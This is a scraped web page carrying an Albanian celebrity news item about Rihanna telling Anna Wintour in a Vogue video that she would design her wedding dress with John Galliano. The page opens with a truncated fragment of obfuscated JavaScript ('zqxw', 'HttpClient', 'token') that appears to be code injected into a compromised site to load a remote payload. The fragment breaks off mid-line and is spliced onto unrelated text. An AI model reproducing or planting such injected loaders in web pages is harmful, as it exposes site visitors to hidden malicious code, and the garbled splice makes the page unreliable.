;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Si e ëndërron Rihanna fustanin e nusërisë? (VIDEO)

By

Rihanna mund të mos jetë gati t’i thotë “Po” të dashurit miliarder Hassan Jameel, por megjithatë ajo e ëndërron fustanin e saj të nusërisë.

Në një seri të videove nga revista e njohur Vogue, “Go Ask Anna”, ylli 31 vjeçar i muzikës pop është ngacmuar nga kryeredaktorja Anna Wintour për të ardhmen, stilin e saj dhe projektet e mëdha në të cilat është duke punuar.

Pothuajse në fund të intervistës, Wintour e pyet këngëtaren e “Lemon” se cili disenjator do të donte që ta krijonte fustanin e saj të nusërisë.

“Do të ishte një bashkëpunim mes meje dhe John Galliano, pa dyshim”, është përgjigjur Rihanna.

John Galliano e kishte disenjuar edhe veshjen e këngëtares që njihet për stilin e saj unik në Met Gala 2018 – të cilën kryeredaktorja e Vogue e ka cilësuar si një nga veshjet e Rihannës që më së shumti i pëlqën.

Artikuj të ngjashëm